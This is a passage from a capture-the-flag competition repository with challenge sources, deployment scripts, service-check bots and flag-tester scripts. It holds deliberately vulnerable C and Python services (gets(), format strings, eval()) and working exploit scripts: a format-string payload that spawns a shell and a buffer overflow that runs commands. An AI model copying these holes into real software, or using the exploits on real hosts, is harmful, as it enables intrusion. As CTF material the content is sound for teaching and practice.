27 | 28 | 29 | -------------------------------------------------------------------------------- /2017-finals/soal/musicality_icon/challs/static/vendor/inputmask/bindings/inputmask.binding.min.js: -------------------------------------------------------------------------------- 1 | /*! 2 | * bindings/inputmask.binding.min.js 3 | * https://github.com/RobinHerbots/Inputmask 4 | * Copyright (c) 2010 - 2017 Robin Herbots 5 | * Licensed under the MIT license (http://www.opensource.org/licenses/mit-license.php) 6 | * Version: 4.0.1-35 7 | */ 8 | 9 | !function(a){"function"==typeof define&&define.amd?define(["jquery","../inputmask","../global/document"],a):"object"==typeof exports?module.exports=a(require("jquery"),require("../inputmask"),require("../global/document")):a(jQuery,window.Inputmask,document)}(function(a,b,c){a(c).ajaxComplete(function(c,d,e){-1!==a.inArray("html",e.dataTypes)&&a(".inputmask, [data-inputmask], [data-inputmask-mask], [data-inputmask-alias]").each(function(a,c){void 0===c.inputmask&&b().mask(c)})}).ready(function(){a(".inputmask, [data-inputmask], [data-inputmask-mask], [data-inputmask-alias]").each(function(a,c){void 0===c.inputmask&&b().mask(c)})})}); -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/codeception.yml: -------------------------------------------------------------------------------- 1 | actor: Tester 2 | paths: 3 | tests: tests 4 | log: tests/_output 5 | data: tests/_data 6 | helpers: tests/_support 7 | settings: 8 | bootstrap: _bootstrap.php 9 | memory_limit: 1024M 10 | colors: true 11 | modules: 12 | config: 13 | Yii2: 14 | configFile: 'config/test.php' 15 | cleanup: false 16 | 17 | # To enable code coverage: 18 | #coverage: 19 | # #c3_url: http://localhost:8080/index-test.php/ 20 | # enabled: true 21 | # #remote: true 22 | # #remote_config: '../codeception.yml' 23 | # whitelist: 24 | # include: 25 | # - models/* 26 | # - controllers/* 27 | # - commands/* 28 | # - 
mail/* 29 | # blacklist: 30 | # include: 31 | # - assets/* 32 | # - config/* 33 | # - runtime/* 34 | # - vendor/* 35 | # - views/* 36 | # - web/* 37 | # - tests/* 38 | -------------------------------------------------------------------------------- /2017-finals/soal/autodeploy.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | if [ -z "$1" ];then 3 | echo "need team numbers as argument"; echo "$0 (team numbers)"; exit 4 | fi 5 | 6 | 7 | team_num=$1 8 | 9 | echo "Birthday Card" 10 | sleep 2 11 | (cd ./birthday_card && ./docker_build.sh birthday $team_num) 12 | 13 | echo "Buaya LSI" 14 | sleep 2 15 | (cd ./buaya_lsi && ./docker_build.sh buaya $team_num) 16 | 17 | echo "Cacah Jiwa" 18 | sleep 2 19 | #(cd ./cacah_jiwa && ./docker_build.sh cacah_jiwa $team_num) 20 | 21 | echo "How to Blog" 22 | sleep 2 23 | (cd ./howto_blog && ./docker_build.sh howto_blog $team_num) 24 | 25 | echo "Kudanil LSI" 26 | sleep 2 27 | #(cd ./kudanil_lsi && ./docker_build.sh kudanil_lsi $team_num) 28 | 29 | echo "Math Service" 30 | sleep 2 31 | (cd ./math_service && ./docker_build.sh math $team_num) 32 | 33 | echo "Musicality Icon" 34 | sleep 2 35 | (cd ./musicality_icon && ./docker_build.sh musicality_icon $team_num) 36 | 37 | echo "Sanca" 38 | sleep 2 39 | (cd ./sanca && ./docker_build.sh sanca $team_num) 40 | -------------------------------------------------------------------------------- /2017-finals/soal/musicality_icon/challs/static/css/one-page-wonder.css: -------------------------------------------------------------------------------- 1 | /*! 
2 | * Start Bootstrap - One Page Wonder (http://startbootstrap.com/template-overviews/one-page-wonder) 3 | * Copyright 2013-2017 Start Bootstrap 4 | * Licensed under MIT (https://github.com/BlackrockDigital/startbootstrap-one-page-wonder/blob/master/LICENSE) 5 | */ 6 | 7 | body { 8 | padding-top: 54px; 9 | } 10 | 11 | @media (min-width: 992px) { 12 | body { 13 | padding-top: 56px; 14 | } 15 | } 16 | 17 | header.masthead { 18 | background: url('https://unsplash.it/1900/1080?image=304') no-repeat center center scroll; 19 | -webkit-background-size: cover; 20 | -moz-background-size: cover; 21 | background-size: cover; 22 | -o-background-size: cover; 23 | } 24 | 25 | header.masthead > .overlay { 26 | padding: 5rem 0; 27 | text-align: center; 28 | background: rgba(0, 0, 0, 0.6); 29 | } 30 | 31 | @media (min-width: 992px) { 32 | header.masthead > .overlay { 33 | padding: 10rem 0; 34 | } 35 | } 36 | -------------------------------------------------------------------------------- /2017-finals/flag_tester/test_service_6.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | def get_payload(): 3 | payload = open("solusi_6","r").read() 4 | return payload 5 | 6 | def get_flag(host,port): 7 | conn = remote(host,port) 8 | conn.recvuntil("6+5=") 9 | conn.sendline(get_payload()) 10 | flag = conn.recvuntil("}") 11 | conn.close() 12 | return flag 13 | 14 | 15 | def loop_through(): 16 | flags = [] 17 | for team in range(1,11): 18 | # ganti disiniii 19 | if team >9: 20 | team_str = str(team) 21 | else: 22 | team_str = '0'+str(team) 23 | port = int("3"+team_str+"06") 24 | flag = get_flag("agrihack.party",port) 25 | flags.append(flag.strip()) 26 | return flags 27 | 28 | 29 | 30 | def start(): 31 | flags = loop_through() 32 | count = 1 33 | file_out = open('out','w') 34 | for flag in flags: 35 | file_out.write(flag + ',' +str(count)+',6\n') 36 | count+=1 37 | 38 | 39 | 40 | start() 41 | 
-------------------------------------------------------------------------------- /2017-quals/exploitation/mrx/mrx.c: --------------------------------------------------------------------------------
//gcc -m32 mrx.c -o mrx
//solution : python -c "print 'a'*96 + '\x10\xa0\x04\x08' + '134514036'" | ./mrx
//
// CTF exploitation challenge source. The memory-safety defects below are
// deliberate (the author tags them "bad scanf implementation"); the comments
// name each defect and the corrected form so the file can be read as a
// review exercise.

// NOTE(review): both header names were lost when this listing was extracted.
// The calls below need the declarations of printf/scanf/fflush and system,
// presumably <stdio.h> and <stdlib.h> -- confirm against the original file.
#include
#include

// Prints the flag file by running `/bin/cat flag` through system().
// Nothing in this file calls it: main() only calls whoami() and check().
void __data()
{
    system("/bin/cat flag");
}

// Prompts for two PINs and prints a message when they equal 0x31337 and
// 0xcafebabe. The acceptance branch only prints; it does not call __data().
void check()
{
    // Neither variable is initialized before the scanf calls below.
    int pin1, pin2;

    printf("Pin please:");
    // Defect: scanf("%d", ...) expects an int*, but the *value* of pin1 is
    // passed. scanf therefore stores the parsed number at whatever address
    // that stale stack value happens to hold. The correct call is
    // scanf("%d", &pin1); building with -Wall (-Wformat) reports the mismatch.
    scanf("%d", pin1); //bad scanf implementation
    // fflush() is only defined for output streams in ISO C; on an input
    // stream the behaviour is undefined.
    fflush(stdin);

    printf("Pin again please:");
    // Same defect as above, with pin2: should be scanf("%d", &pin2).
    scanf("%d", pin2); //bad scanf implementation
    fflush(stdin);

    if(pin1 == 0x31337 && pin2 == 0xcafebabe)
        printf("You have been accepted");
}

// Prompts for a name and reads one whitespace-delimited token into a
// 100-byte stack buffer. The value is not used afterwards.
void whoami()
{
    char name[100];
    printf("who the f*** are you? ");
    // "%100s" stores up to 100 characters plus the terminating NUL, i.e. up
    // to 101 bytes, into a 100-byte array. A bounded read would use "%99s".
    scanf("%100s", name);
}

// Prints the banner, then runs whoami() followed by check().
int main()
{

    printf("==========MRX==========\n");
    printf("1) No System Is Safe.\n");
    printf("2) Aim for the Impossible.\n");
    printf("3) Enjoy the real world as much as the net world.\n");
    whoami();
    check();

    return 0;
}

-------------------------------------------------------------------------------- /2017-quals/web-hacking/where_it_is/src/main.py: -------------------------------------------------------------------------------- 1 | from flask import Flask, request, render_template 2 | # set the project root directory as the static folder, you can set others.
3 | app = Flask(__name__) 4 | @app.route('/') 5 | @app.route('/') 6 | def root(index="index.html"): 7 | return app.send_static_file(index) 8 | 9 | @app.route('/static/css/') 10 | @app.route('/static/css') 11 | @app.route('/css') 12 | @app.route('/css/') 13 | def css(): 14 | return app.send_static_file("closer.html") 15 | 16 | @app.route('/css/') 17 | def send_css(filename): 18 | return send_from_directory('css', filename) 19 | 20 | @app.route('/robots.txt') 21 | def robot(): 22 | return 'disallow: /static/css/flag' 23 | 24 | @app.route('/static/css/portal/') 25 | @app.route('/static/css/portal') 26 | def thi(): 27 | return app.send_static_file("portal.html") 28 | 29 | @app.errorhandler(404) 30 | def page_not_found(e): 31 | return render_template('404.html'),404 32 | 33 | if __name__ == '__main__': 34 | app.run(host='0.0.0.0',port=80) 35 | -------------------------------------------------------------------------------- /2017-quals/web-hacking/comot/src/botsrc/comot.py: -------------------------------------------------------------------------------- 1 | from selenium import webdriver 2 | from selenium.webdriver.common.desired_capabilities import DesiredCapabilities 3 | from selenium.webdriver.common.action_chains import ActionChains 4 | import sys 5 | 6 | if(len(sys.argv) < 2): 7 | print('URL INPUT!!!') 8 | exit() 9 | 10 | url = sys.argv[1] 11 | caps = DesiredCapabilities.PHANTOMJS 12 | caps["phantomjs.page.settings.userAgent"] = "Mozilla/5.0 (iPhone; CPU iPhone OS 10_3 like Mac OS X) AppleWebKit/603.1.23 (KHTML, like Gecko) Version/10.0 Mobile/14E5239e Safari/602.1" 13 | 14 | driver = webdriver.PhantomJS(desired_capabilities=caps) 15 | driver.get('http://[DOMAIN]:PORT') 16 | 17 | driver.add_cookie({ 18 | 'domain': '.DOMAIN', 19 | 'name': 'session', 20 | 'value': 'b5470b800ef87a7018594959ccf4b339', 21 | 'httponly': 'true', 22 | 'path': '/', 23 | 'expires': 'Session' 24 | }) 25 | 26 | driver.get('http://[DOMAIN]:[PORT]/notes/'+url) 27 | 28 | name = 
driver.find_element_by_css_selector("html") 29 | ActionChains(driver).move_to_element(name).perform() 30 | -------------------------------------------------------------------------------- /2017-finals/bot/bot6.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # {1:[1,1,1,1,1]} 3 | 4 | from pwn import * 5 | import time 6 | 7 | def submit(q): 8 | print "[+] Submit query" 9 | a = remote('192.168.8.236', 1337) 10 | a.recvuntil('Username:') 11 | a.sendline('bot') 12 | a.recvuntil('Password:') 13 | a.sendline('awkarin') 14 | a.sendline(q) 15 | a.recvuntil('Done') 16 | a.close() 17 | print "[+] Done" 18 | 19 | def cek(): 20 | print "[+] Checking up service ....." 21 | q = '{6:[' 22 | for i in range(1, 11): 23 | port = '3' + str(i).zfill(2) + '06' 24 | ip = '192.168.8.236' 25 | try: 26 | a = remote(ip, port) 27 | hasil = a.recvuntil('6+5=', timeout = 2) 28 | if not hasil: 29 | raise e 30 | q += str(1) 31 | except: 32 | q += str(0) 33 | 34 | if i < 10: 35 | q += ',' 36 | q += ']}' 37 | print "[+] Query : ", q 38 | return q 39 | 40 | if __name__ == '__main__': 41 | while 1: 42 | real = time.time() 43 | b = time.time() 44 | 45 | submit(cek()) 46 | 47 | total = time.time() - b 48 | time.sleep(30-total) 49 | 50 | print time.time() - real -------------------------------------------------------------------------------- /2017-finals/bot/bot3.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # {1:[1,1,1,1,1]} 3 | 4 | from pwn import * 5 | import time 6 | 7 | 8 | def submit(q): 9 | print "[+] Submit query" 10 | a = remote('192.168.8.236', 1337) 11 | a.recvuntil('Username:') 12 | a.sendline('bot') 13 | a.recvuntil('Password:') 14 | a.sendline('awkarin') 15 | a.sendline(q) 16 | a.recvuntil('Done') 17 | a.close() 18 | print "[+] Done" 19 | 20 | def cek(): 21 | print "[+] Checking up service ....." 
22 | q = '{3:[' 23 | for i in range(1, 11): 24 | port = '3' + str(i).zfill(2) + '03' 25 | ip = '192.168.8.236' 26 | try: 27 | a = remote(ip, port) 28 | hasil = a.recvuntil('Nama suami :', timeout = 2) 29 | if not hasil: 30 | raise e 31 | q += str(1) 32 | except: 33 | q += str(0) 34 | 35 | if i < 10: 36 | q += ',' 37 | q += ']}' 38 | print "[+] Query : ", q 39 | return q 40 | 41 | if __name__ == '__main__': 42 | while 1: 43 | real = time.time() 44 | b = time.time() 45 | 46 | submit(cek()) 47 | 48 | total = time.time() - b 49 | time.sleep(30-total) 50 | 51 | print time.time() - real -------------------------------------------------------------------------------- /2017-finals/bot/bot8.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # {1:[1,1,1,1,1]} 3 | 4 | from pwn import * 5 | import time 6 | 7 | def submit(q): 8 | print "[+] Submit query" 9 | a = remote('192.168.8.236', 1337) 10 | a.recvuntil('Username:') 11 | a.sendline('bot') 12 | a.recvuntil('Password:') 13 | a.sendline('awkarin') 14 | a.sendline(q) 15 | a.recvuntil('Done') 16 | a.close() 17 | print "[+] Done" 18 | 19 | def cek(): 20 | print "[+] Checking up service ....." 
21 | q = '{8:[' 22 | for i in range(1, 11): 23 | port = '3' + str(i).zfill(2) + '08' 24 | ip = '192.168.8.236' 25 | try: 26 | a = remote(ip, port) 27 | hasil = a.recvuntil('Type Anything You Want', timeout = 2) 28 | if not hasil: 29 | raise e 30 | q += str(1) 31 | except: 32 | q += str(0) 33 | 34 | if i < 10: 35 | q += ',' 36 | q += ']}' 37 | print "[+] Query : ", q 38 | return q 39 | 40 | if __name__ == '__main__': 41 | while 1: 42 | real = time.time() 43 | b = time.time() 44 | 45 | submit(cek()) 46 | 47 | total = time.time() - b 48 | time.sleep(30-total) 49 | 50 | print time.time() - real -------------------------------------------------------------------------------- /2017-finals/soal/sanca/sanca: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import sys,re 3 | 4 | class Unbuffered(object): 5 | def __init__(self, stream): 6 | self.stream = stream 7 | def write(self, data): 8 | self.stream.write(data) 9 | self.stream.flush() 10 | def writelines(self, datas): 11 | self.stream.writelines(datas) 12 | self.stream.flush() 13 | def __getattr__(self, attr): 14 | return getattr(self.stream, attr) 15 | 16 | sys.stdout = Unbuffered(sys.stdout) 17 | 18 | def XxxXxxx_xXxxxxx(s): 19 | return re.sub(r"[A-Za-z]+('[A-Za-z]+)?", 20 | lambda mo: mo.group(0)[0].upper() + 21 | mo.group(0)[1:].lower(), 22 | s) 23 | 24 | print """Sanca 2.0 25 | Type Anything You Want 26 | ____ 27 | ________________________/ O \___/ 28 | <_/_\_/_\_/_\_/_\_/_\_/_______/ \ 29 | 30 | """ 31 | while 1: 32 | try: 33 | print eval(XxxXxxx_xXxxxxx(raw_input(">>> "))) 34 | except KeyboardInterrupt: 35 | print " CTRL+Z to Exit" 36 | except Exception as e: 37 | print(e) 38 | -------------------------------------------------------------------------------- /2017-finals/bot/bot5.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # {1:[1,1,1,1,1]} 3 | 4 | from pwn import * 5 | import time 6 | 7 
| def submit(q): 8 | print "[+] Submit query" 9 | a = remote('192.168.8.236', 1337) 10 | a.recvuntil('Username:') 11 | a.sendline('bot') 12 | a.recvuntil('Password:') 13 | a.sendline('awkarin') 14 | a.sendline(q) 15 | a.recvuntil('Done') 16 | a.close() 17 | print "[+] Done" 18 | 19 | def cek(): 20 | print "[+] Checking up service ....." 21 | q = '{5:[' 22 | for i in range(1, 11): 23 | port = '3' + str(i).zfill(2) + '05' 24 | ip = '192.168.8.236' 25 | try: 26 | a = remote(ip, port) 27 | hasil = a.recvuntil('Dramaga Game Studios Present', timeout = 2) 28 | if not hasil: 29 | raise e 30 | q += str(1) 31 | except: 32 | q += str(0) 33 | 34 | if i < 10: 35 | q += ',' 36 | q += ']}' 37 | print "[+] Query : ", q 38 | return q 39 | 40 | if __name__ == '__main__': 41 | while 1: 42 | real = time.time() 43 | b = time.time() 44 | 45 | submit(cek()) 46 | 47 | total = time.time() - b 48 | time.sleep(30-total) 49 | 50 | print time.time() - real -------------------------------------------------------------------------------- /2017-finals/soal/birthday_card/challs/templates/home.html: -------------------------------------------------------------------------------- 1 | 2 | 36 | 37 | 38 | 39 |

Happy Birthday %s!

43 | 44 | 45 | 46 | -------------------------------------------------------------------------------- /2017-quals/exploitation/turuturu/src/turuturu.c: -------------------------------------------------------------------------------- 1 | // gcc -D_FORTIFY_SOURCE=2 turuturu.c -o turuturu -fstack-protector-all -Wl,-z,relro,-z,now -fPIE -pie 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | 8 | void printFlag(){ 9 | system("cat flag"); 10 | exit(0); 11 | } 12 | 13 | int main(){ 14 | setvbuf(stdout, NULL, _IONBF, 0); 15 | alarm(5); 16 | signal(SIGALRM, exit); 17 | int i; 18 | int pin[8]; 19 | char buff[8]; 20 | srand(time(NULL)); 21 | for(i=0;i<8;i++){ 22 | pin[i] = rand() % 10; 23 | } 24 | puts("[=== Turuturu ===]"); 25 | for(i=0; i<5; i++){ 26 | puts("Masukkan PIN:"); 27 | fgets(buff, 9, stdin); 28 | strtok(buff, "\n"); 29 | if((pin[0] == buff[0] - '0') && (pin[1] == buff[1] - '0') && (pin[2] == buff[2] - '0') && (pin[3] == buff[3] - '0') && (pin[4] == buff[4] - '0') && (pin[5] == buff[5] - '0') && (pin[6] == buff[6] - '0') && (pin[7] == buff[7] - '0')){ 30 | printFlag(); 31 | } 32 | printf("PIN: "); 33 | printf(buff); 34 | puts(", tidak sesuai!"); 35 | } 36 | 37 | } 38 | -------------------------------------------------------------------------------- /2017-finals/bot/bot2.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # {1:[1,1,1,1,1]} 3 | 4 | from pwn import * 5 | import time 6 | 7 | 8 | 9 | def submit(q): 10 | print "[+] Submit query" 11 | a = remote('192.168.8.236', 1337) 12 | a.recvuntil('Username:') 13 | a.sendline('bot') 14 | a.recvuntil('Password:') 15 | a.sendline('awkarin') 16 | a.sendline(q) 17 | a.recvuntil('Done') 18 | a.close() 19 | print "[+] Done" 20 | 21 | def cek(): 22 | print "[+] Checking up service ....." 
23 | q = '{2:[' 24 | for i in range(1, 11): 25 | port = '3' + str(i).zfill(2) + '02' 26 | ip = '192.168.8.236' 27 | try: 28 | a = remote(ip, port) 29 | hasil = a.recvuntil('Penangkaran Buaya LSI', timeout=2) 30 | if not hasil: 31 | raise e 32 | q += str(1) 33 | except: 34 | q += str(0) 35 | 36 | if i < 10: 37 | q += ',' 38 | a.close() 39 | q += ']}' 40 | print "[+] Query : ", q 41 | return q 42 | 43 | if __name__ == '__main__': 44 | while 1: 45 | real = time.time() 46 | b = time.time() 47 | 48 | submit(cek()) 49 | 50 | total = time.time() - b 51 | time.sleep(30-total) 52 | 53 | print time.time() - real -------------------------------------------------------------------------------- /2017-finals/soal/cacah_jiwa/cacah.c: -------------------------------------------------------------------------------- 1 | // gcc -g -m32 -fno-stack-protector -mpreferred-stack-boundary=4 cacah.c -o cacah 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | 8 | 9 | char *cmd = "/bin/sh"; 10 | 11 | struct nodes 12 | { 13 | char *nama; 14 | int umur; 15 | }; 16 | 17 | void init() 18 | { 19 | setvbuf(stdout, NULL, _IONBF, 0); 20 | } 21 | 22 | void libc_main() 23 | { 24 | system(cmd); 25 | } 26 | 27 | 28 | void welcome() 29 | { 30 | printf("Cacah Jiwa Online 31337\n"); 31 | } 32 | 33 | int main(int argc, char * argv[]) 34 | { 35 | init(); 36 | welcome(); 37 | 38 | struct nodes *node1, *node2, *node3; 39 | 40 | int umur; 41 | 42 | while(1) 43 | { 44 | node1 = malloc(sizeof(struct nodes)); 45 | node1->nama = malloc(8); 46 | node1->umur = 1; 47 | 48 | node2 = malloc(sizeof(struct nodes)); 49 | node2->nama = malloc(8); 50 | node1->umur = 2; 51 | 52 | printf("Nama suami : "); 53 | gets(node1->nama); 54 | 55 | printf("Nama istri : "); 56 | gets(node2->nama); 57 | 58 | fflush(stdin); 59 | } 60 | 61 | return 0; 62 | } -------------------------------------------------------------------------------- /2017-quals/exploitation/epoch-service/src/poc.py: 
-------------------------------------------------------------------------------- 1 | from pwn import * 2 | import re 3 | 4 | p = remote('cangkul.ittoday.web.id', 47000) 5 | 6 | 7 | temp = p.recvline() 8 | print temp 9 | cari = re.search('Nomor Pengguna: (.+?)\n', temp) 10 | youadd = eval("0" + cari.group(1)) 11 | youadd2 = p32(youadd + 2) 12 | youadd3 = p32(youadd + 4) 13 | youadd4 = p32(youadd + 6) 14 | youadd = p32(youadd) 15 | 16 | hspasi = 0x2068 - 16 17 | stripb = 0x622f - 0x2068 18 | inn = 0x6e69 - 0x622f 19 | strips = 0x732f - 0x6e69 20 | 21 | # /bin = '0x6e69622f' 22 | # /sh = '0x2068732f' 23 | 24 | # / '0x2f' 25 | # b '0x62' 26 | # i '0x69' 27 | # n '0x6e' 28 | # / '0x2f' 29 | # s '0x73' 30 | # h '0x68' 31 | # '0x20' 32 | 33 | # urutanpayload 34 | # youadd : stripb 35 | # youadd2 : inn 36 | # youadd3 : strips 37 | # youadd4 : hspasi 38 | payload1 = youadd4 + youadd + youadd2 + youadd3 + "%"+str(hspasi)+"x"+"%5$hn" + "%"+str(stripb)+"x"+"%6$hn" 39 | payload1 += "%"+str(inn)+"x"+"%7$hn" + "%"+str(strips)+"x"+"%8$hn" + "\x00" 40 | 41 | #payload1 42 | 43 | p.sendline(payload1) 44 | 45 | print payload1 46 | print p.recvline() 47 | p.interactive() 48 | -------------------------------------------------------------------------------- /2017-finals/flag_tester/test_service_3.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | def get_flag(host,port): 4 | 5 | context(arch='i386', bits=32, os='linux') 6 | a = remote(host,port) 7 | 8 | print a.recvuntil('Nama suami : ') 9 | a.sendline('a'*16 + p32(0x0804a010)) 10 | 11 | print a.recvuntil('Nama istri : ') 12 | a.sendline(p32(0x08048598)) 13 | 14 | 15 | a.sendline("whoami") 16 | dapat = a.recvline() 17 | flag = dapat.strip() 18 | a.close() 19 | return flag 20 | 21 | 22 | def loop_through(): 23 | flags = [] 24 | for team in range(1,11): 25 | # ganti disiniii 26 | if team >9: 27 | team_str = str(team) 28 | else: 29 | team_str = '0'+str(team) 30 | port = 
int("3"+team_str+"03") 31 | flag = get_flag("agrihack.party",port) 32 | flags.append(flag.strip()) 33 | return flags 34 | 35 | 36 | 37 | def start(): 38 | flags = loop_through() 39 | count = 1 40 | file_out = open('out','w') 41 | for flag in flags: 42 | file_out.write(flag + ',' +str(count)+',3\n') 43 | count+=1 44 | 45 | 46 | 47 | start() 48 | -------------------------------------------------------------------------------- /2017-finals/bot/bot1.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # {1:[1,1,1,1,1]} 3 | 4 | from pwn import * 5 | import requests 6 | import time 7 | 8 | def submit(q): 9 | print "[+] Submit query" 10 | a = remote('192.168.8.236', 1337) 11 | a.recvuntil('Username:') 12 | a.sendline('bot') 13 | a.recvuntil('Password:') 14 | a.sendline('awkarin') 15 | a.sendline(q) 16 | a.recvuntil('Done') 17 | a.close() 18 | print "[+] Done" 19 | 20 | def cek(): 21 | print "[+] Checking up service ....." 22 | q = '{1:[' 23 | for i in range(1, 11): 24 | port = '3' + str(i).zfill(2) + '01' 25 | ip = 'http://192.168.8.236' 26 | url = ip + ':' + port 27 | print url 28 | try: 29 | a = requests.get(url, timeout = 2) # treshold 2 detik waktu tunggu 30 | hasil = a.text 31 | if 'Celebrate It' not in hasil: 32 | raise e 33 | q += str(1) 34 | except: 35 | q += str(0) 36 | 37 | if i < 10: 38 | q += ',' 39 | q += ']}' 40 | print "[+] Query : ", q 41 | return q 42 | 43 | if __name__ == '__main__': 44 | while 1: 45 | real = time.time() 46 | b = time.time() 47 | 48 | submit(cek()) 49 | 50 | total = time.time() - b 51 | time.sleep(30-total) 52 | 53 | print time.time() - real -------------------------------------------------------------------------------- /2017-finals/bot/bot4.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # {1:[1,1,1,1,1]} 3 | 4 | from pwn import * 5 | import requests 6 | import time 7 | 8 | def submit(q): 9 | print "[+] Submit query" 
10 | a = remote('192.168.8.236', 1337) 11 | a.recvuntil('Username:') 12 | a.sendline('bot') 13 | a.recvuntil('Password:') 14 | a.sendline('awkarin') 15 | a.sendline(q) 16 | a.recvuntil('Done') 17 | a.close() 18 | print "[+] Done" 19 | 20 | def cek(): 21 | print "[+] Checking up service ....." 22 | q = '{4:[' 23 | for i in range(1, 11): 24 | port = '3' + str(i).zfill(2) + '04' 25 | ip = 'http://192.168.8.236' 26 | url = ip + ':' + port 27 | print url 28 | try: 29 | a = requests.get(url, timeout = 2) # treshold 2 detik waktu tunggu 30 | hasil = a.text 31 | if 'How To Blog | Home' not in hasil: 32 | raise e 33 | q += str(1) 34 | except: 35 | q += str(0) 36 | 37 | if i < 10: 38 | q += ',' 39 | q += ']}' 40 | print "[+] Query : ", q 41 | return q 42 | 43 | if __name__ == '__main__': 44 | while 1: 45 | real = time.time() 46 | b = time.time() 47 | 48 | submit(cek()) 49 | 50 | total = time.time() - b 51 | time.sleep(30-total) 52 | 53 | print time.time() - real -------------------------------------------------------------------------------- /2017-finals/bot/bot7.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # {1:[1,1,1,1,1]} 3 | 4 | from pwn import * 5 | import requests 6 | import time 7 | 8 | def submit(q): 9 | print "[+] Submit query" 10 | a = remote('192.168.8.236', 1337) 11 | a.recvuntil('Username:') 12 | a.sendline('bot') 13 | a.recvuntil('Password:') 14 | a.sendline('awkarin') 15 | a.sendline(q) 16 | a.recvuntil('Done') 17 | a.close() 18 | print "[+] Done" 19 | 20 | def cek(): 21 | print "[+] Checking up service ....." 22 | q = '{7:[' 23 | for i in range(1, 11): 24 | port = '3' + str(i).zfill(2) + '07' 25 | ip = 'http://192.168.8.236' 26 | url = ip + ':' + port 27 | print url 28 | try: 29 | a = requests.get(url, timeout = 2) # treshold 2 detik waktu tunggu 30 | hasil = a.text 31 | if 'For those about to rock...' 
not in hasil: 32 | raise e 33 | q += str(1) 34 | except: 35 | q += str(0) 36 | 37 | if i < 10: 38 | q += ',' 39 | q += ']}' 40 | print "[+] Query : ", q 41 | return q 42 | 43 | if __name__ == '__main__': 44 | while 1: 45 | real = time.time() 46 | b = time.time() 47 | submit(cek()) 48 | 49 | total = time.time() - b 50 | time.sleep(30-total) 51 | 52 | print time.time() - real -------------------------------------------------------------------------------- /2017-finals/flag_tester/test_service_1.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | 4 | def get_flag(host,port): 5 | a = process('./start_tpl.sh') 6 | data = a.recvline() 7 | while "Run commands on the operating system" not in data: 8 | data = a.recvline() 9 | print data.strip() 10 | a.sendline('cat fl*') 11 | result = a.recvline() 12 | start_pos = result.find("HackToday") 13 | flag = result[start_pos:] 14 | print flag 15 | 16 | a.close() 17 | return flag.strip() 18 | 19 | 20 | def loop_through(): 21 | flags = [] 22 | for team in range(1,11): 23 | # ganti disiniii 24 | if team >9: 25 | team_str = str(team) 26 | else: 27 | team_str = '0'+str(team) 28 | port = int("3"+team_str+"01") 29 | flag = get_flag("agrihack.party",port) 30 | flags.append(flag.strip()) 31 | return flags 32 | 33 | 34 | 35 | def start(): 36 | flags = loop_through() 37 | count = 1 38 | file_out = open('out','w') 39 | for flag in flags: 40 | file_out.write(flag + ',' +str(count)+',1\n') 41 | count+=1 42 | 43 | 44 | #get_flag("agrihack.party",30108) 45 | start() 46 | -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/config/console.php: -------------------------------------------------------------------------------- 1 | 'basic-console', 8 | 'basePath' => dirname(__DIR__), 9 | 'bootstrap' => ['log'], 10 | 'controllerNamespace' => 'app\commands', 11 | 'components' => [ 12 | 'cache' => [ 13 | 'class' => 
'yii\caching\FileCache', 14 | ], 15 | 'log' => [ 16 | 'targets' => [ 17 | [ 18 | 'class' => 'yii\log\FileTarget', 19 | 'levels' => ['error', 'warning'], 20 | ], 21 | ], 22 | ], 23 | 'db' => $db, 24 | ], 25 | 'params' => $params, 26 | /* 27 | 'controllerMap' => [ 28 | 'fixture' => [ // Fixture generation command line. 29 | 'class' => 'yii\faker\FixtureController', 30 | ], 31 | ], 32 | */ 33 | ]; 34 | 35 | if (YII_ENV_DEV) { 36 | // configuration adjustments for 'dev' environment 37 | $config['bootstrap'][] = 'gii'; 38 | $config['modules']['gii'] = [ 39 | 'class' => 'yii\gii\Module', 40 | ]; 41 | } 42 | 43 | return $config; 44 | -------------------------------------------------------------------------------- /2017-finals/soal/howto_blog/challs/tests/acceptance/ContactCest.php: -------------------------------------------------------------------------------- 1 | amOnPage(Url::toRoute('/site/contact')); 10 | } 11 | 12 | public function contactPageWorks(AcceptanceTester $I) 13 | { 14 | $I->wantTo('ensure that contact page works'); 15 | $I->see('Contact', 'h1'); 16 | } 17 | 18 | public function contactFormCanBeSubmitted(AcceptanceTester $I) 19 | { 20 | $I->amGoingTo('submit contact form with correct data'); 21 | $I->fillField('#contactform-name', 'tester'); 22 | $I->fillField('#contactform-email', 'tester@example.com'); 23 | $I->fillField('#contactform-subject', 'test subject'); 24 | $I->fillField('#contactform-body', 'test content'); 25 | $I->fillField('#contactform-verifycode', 'testme'); 26 | 27 | $I->click('contact-button'); 28 | 29 | $I->wait(2); // wait for button to be clicked 30 | 31 | $I->dontSeeElement('#contact-form'); 32 | $I->see('Thank you for contacting us. 
We will respond to you as soon as possible.'); 33 | } 34 | } 35 | -------------------------------------------------------------------------------- /2017-quals/web-hacking/privilege_escalation/login.php: -------------------------------------------------------------------------------- 1 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 |
17 |

Login

32 |
-------------------------------------------------------------------------------- /2017-quals/exploitation/chatbot/src/chatbot.c: --------------------------------------------------------------------------------
// gcc -o Hacktoday -fno-stack-protector -z execstack source.c -no-pie
//
// CTF exploitation challenge source. The build line above switches off the
// stack protector, marks the stack executable and disables PIE, so the
// binary is built without those mitigations on purpose. The comments below
// name the defects in the code and the corrected forms.

// NOTE(review): both header names were lost when this listing was extracted.
// The calls below need the stdio declarations and abs(), presumably
// <stdio.h> and <stdlib.h> -- confirm against the original file.
#include
#include

